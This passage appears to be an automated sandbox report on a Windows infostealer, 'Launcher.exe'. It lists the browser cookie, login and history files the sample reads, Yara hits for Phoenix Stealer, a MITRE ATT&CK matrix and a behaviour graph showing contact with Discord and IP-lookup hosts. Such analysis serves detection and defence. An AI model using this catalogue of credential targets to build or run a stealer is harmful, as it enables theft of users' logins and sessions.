          Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies_tmpJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\places.sqlite_tmp-shmJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data_tmpJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cookies.sqliteJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\places.sqlite_tmpJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cookies.sqlite_tmp-walJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History_tmpJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data_tmpJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cookies.sqlite_tmp-shmJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\places.sqliteJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-releaseJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\places.sqlite_tmp-walJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data_tmpJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies_tmpJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History_tmpJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cookies.sqlite_tmpJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeFile opened / queried: C:\Users\user\AppData\Roaming\.minecraftJump to behavior
          Source: Yara matchFile source: 00000000.00000003.1474969662.00000174E0663000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Launcher.exe PID: 6848, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected Growtopia
          Source: Yara matchFile source: Process Memory Space: Launcher.exe PID: 6848, type: MEMORYSTR
          Yara detected Phoenix Stealer
          Source: Yara matchFile source: Process Memory Space: Launcher.exe PID: 6848, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Windows Management Instrumentation          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Disable or Modify Tools          		1
          OS Credential Dumping          		1
          File and Directory Discovery          		Remote Services1
          Archive Collected Data          		1
          Ingress Tool Transfer          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Exploitation for Client Execution          		12
          Registry Run Keys / Startup Folder          		11
          Process Injection          		1
          Obfuscated Files or Information          		1
          Credentials in Registry          		14
          System Information Discovery          		Remote Desktop Protocol1
          Browser Session Hijacking          		11
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts11
          Command and Scripting Interpreter          		Logon Script (Windows)12
          Registry Run Keys / Startup Folder          		1
          DLL Side-Loading          		Security Account Manager11
          Security Software Discovery          		SMB/Windows Admin Shares22
          Data from Local System          		3
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
          Masquerading          		NTDS2
          Process Discovery          		Distributed Component Object Model1
          Clipboard Data          		4
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Modify Registry          		LSA Secrets21
          Virtualization/Sandbox Evasion          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
          Virtualization/Sandbox Evasion          		Cached Domain Credentials1
          Application Window Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
          Process Injection          		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1632296 Sample: Launcher.exe Startdate: 07/03/2025 Architecture: WINDOWS Score: 100 61 tools.l.google.com 2->61 63 tools.google.com 2->63 65 3 other IPs or domains 2->65 79 Antivirus detection for dropped file 2->79 81 Antivirus / Scanner detection for submitted sample 2->81 83 Multi AV Scanner detection for dropped file 2->83 85 5 other signatures 2->85 10 Launcher.exe 124 2->10         started        15 chrome.exe 1 2->15         started        signatures3 process4 dnsIp5 73 api.ipify.org 104.26.13.205, 443, 49750 CLOUDFLARENETUS United States 10->73 75 canary.discord.com 162.159.135.232, 443, 49796, 49797 CLOUDFLARENETUS United States 10->75 49 C:\Users\user\AppData\Roaming\...\Update.exe, PE32+ 10->49 dropped 51 C:\Users\user\...\node_sqlite3.node.bak, PE32+ 10->51 dropped 53 C:\Users\user\AppData\...\node_sqlite3.node, PE32+ 10->53 dropped 55 17 other malicious files 10->55 dropped 89 Found many strings related to Crypto-Wallets (likely being stolen) 10->89 91 Overwrites Mozilla Firefox settings 10->91 93 Drops PE files to the startup folder 10->93 97 2 other signatures 10->97 17 cmd.exe 1 10->17         started        19 reg.exe 1 10->19         started        22 cmd.exe 1 10->22         started        27 7 other processes 10->27 77 192.168.2.16, 138, 443, 49313 unknown unknown 15->77 95 Suspicious execution chain found 15->95 24 chrome.exe 15->24         started        file6 signatures7 process8 dnsIp9 29 powershell.exe 17 17->29         started        32 cmd.exe 1 17->32         started        87 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 19->87 34 powershell.exe 8 22->34         started        67 plus.l.google.com 142.250.185.78, 443, 49722 GOOGLEUS United States 24->67 69 www.google.com 172.217.16.196, 443, 49697, 49698 GOOGLEUS United States 24->69 71 6 other IPs or domains 24->71 36 powershell.exe 8 27->36         started        38 powershell.exe 8 27->38         started        40 powershell.exe 8 27->40         started        42 3 other processes 27->42 signatures10 process11 file12 59 C:\Users\user\AppData\...\0a5bipl0.cmdline, Unicode 29->59 dropped 44 csc.exe 3 29->44         started        process13 file14 57 C:\Users\user\AppData\Local\...\0a5bipl0.dll, PE32 44->57 dropped 47 cvtres.exe 1 44->47         started        process15

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.